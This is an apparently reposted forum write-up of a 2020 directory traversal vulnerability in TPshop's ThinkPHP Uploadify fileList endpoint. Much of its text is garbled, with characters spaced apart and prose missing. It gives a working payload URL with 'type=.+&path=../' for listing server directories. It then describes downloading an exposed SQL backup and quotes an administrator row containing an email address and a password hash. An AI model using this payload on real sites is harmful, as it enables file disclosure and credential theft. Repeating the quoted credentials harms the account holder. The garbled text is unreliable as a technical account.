[2144] 2020-09-10_某软件存在目录遍历漏洞

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-16
2020-09-10_某软件存在目录遍历漏洞   e c h o _ d   E D I   2 0 2 0 - 0 9 - 1 0   #   , 3 1   ·     0 1       T P s h o p " B 2 B 2 C B 2 B B 2 C O 2 O C 2 C C 2 B 广 使               广 5 0 2 0 3 0 4 h t t p : / / x x x . x x x x . c n h t t p : / / x x x . x x x . c n / a d m i n 0 x 0 1   0 x 0 2   使 使
0 5 x x x . c n   : / a p p l i c a t i o n / h o m e / c o n t r o l l e r / U p l o a d i f y . p h p 0 x 0 1  
p u b l i c   f u n c t i o n   f i l e L i s t t h i n k p h p   U R L 访 f i l e L i s t i n d e x . p h p / h o m e / u p l o a d i f y / f i l e L i s t 0 x 0 2  
t h i n k p h p : h t t p : / / w w w . t h i n k p h p . c n / d o c u m e n t / 3 0 8 . h t m l t y p e   s w i t c h   t y p e i m a g e s | f l a s h   d e f a u l t     $ a l l o w F i l e s = . + t p y e i m a g e s | f l a s h   0 x 0 3  
t h i n k p h p I p a t h t e m p 使 . . / 穿 g e t f i l e s $ p a t h   穿 0 x 0 4  
$ a l l o w F i l e s     . +   , p r e g _ m a t c h     p a y l o a d 0 6 : S Q L p a y l o a d G E T p a y l o a d h t t p : / / x x x . x x x x . c n / i n d e x . p h p / H o m e / u p l o a d i f y / f i l e L i s t ? t y p e = . + & p a t h = . . / h t t p : / / x x x . x x x x . c n / i n d e x . p h p / H o m e / u p l o a d i f y / f i l e L i s t ? t y p e = . + & p a t h = . . /
s q l w e b 访 S Q L   t p _ a d m i n       a d m i n ' ,   ' w y p 0 0 1 @ 1 6 3 . c o m ' ,   ' 5 1 9 4 7 5 2 2 8 f e 3 5 a d 0 6 7 7 4 4 4 6 5 c 4 2 a 1 9 b 2 ' , h t t p : / / x x x . x x x . c n / p u b l i c / u p l o a d / s q l d a t a / 2 0 1 7 1 0 3 0 - 1 6 5 7 2 0 - 1 . s q l
0 7 1 .   p a t h   2 .   3 .   , , P S E D I
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则